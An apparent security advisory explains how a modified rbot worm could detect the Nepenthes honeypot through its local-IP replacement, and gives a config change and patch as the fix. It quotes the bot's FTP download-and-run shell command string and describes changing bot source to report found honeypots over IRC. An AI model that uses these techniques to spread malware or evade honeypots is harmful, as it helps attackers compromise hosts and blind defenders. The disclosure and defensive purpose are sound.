No false positives: using the local IP replacement
There are many ways to detect a running nepenthes by remote.
However nepenthes simulates a vulnerable computer...
We will try to find a way to detect nepenthes by simulating a worm.
First we have to get malware source code.
We will use a simple rbot and a very common exploit (like asn1)
to create a "Nepenthes Detection Bot".
We have to find something unique in the behaviour of nepenthes.
That's easy.
Nepenthes replaces privateIPs found in shell commands.
We have to replace the orginal line with a not working command like "cmd /c echo open 172.16.1.210 %d >> bb&echo user 1 1 >> bb&echo get %s >> bb &echo quit >> bb &ftp -n -s:bb &del bb &%s \r\n",
ftpport, filename, filename);
.. a rbot like this would never be able to spread.
But nepenthes will replace the local IP and try to download the malware.
We are now going to comment out the filetransfer in the bots ftpd.cpp
and insert a notification like sprintf(sendbuf,"Found Nepenthes at %s", tmpip);
send to IRCLINE
Don't forget to close the data socket ;)
This issue could make your nepenthes honeypot blacklisted,
launched by an automated ditributed Denial of Service attack
or just let the worm choose only real victims and then send the file.
You should change the nepenthes.conf:
downloadmanager
{
replace_local_ips "0";
};
and visit the Nepenthes Homepage
I have to thank them for posting it.
Nasty: using (ulAddress == 0)
It's a good idea to disable local ip replacement.
However it does not effect downs containing "0.0.0.0".
This will set ulAdress to "0" booling bReplaceHost TRUE.
Replacement would be done and down wouldn't get deleted.
-> Detection succeeds
Solution:
Get the official diff file and have some strange behaviours
or try my DownloadManager.cpp
i think it's working now without introducing a new problem. dm.tar.gz
HINT: ignorance is futile. issue got fixed in nepenthes version 0.2.2
All patches or files are for educational purposes only.
They are mainly tested, but nobody is perfect ;).
We will not instruct you how to patch or overwrite.
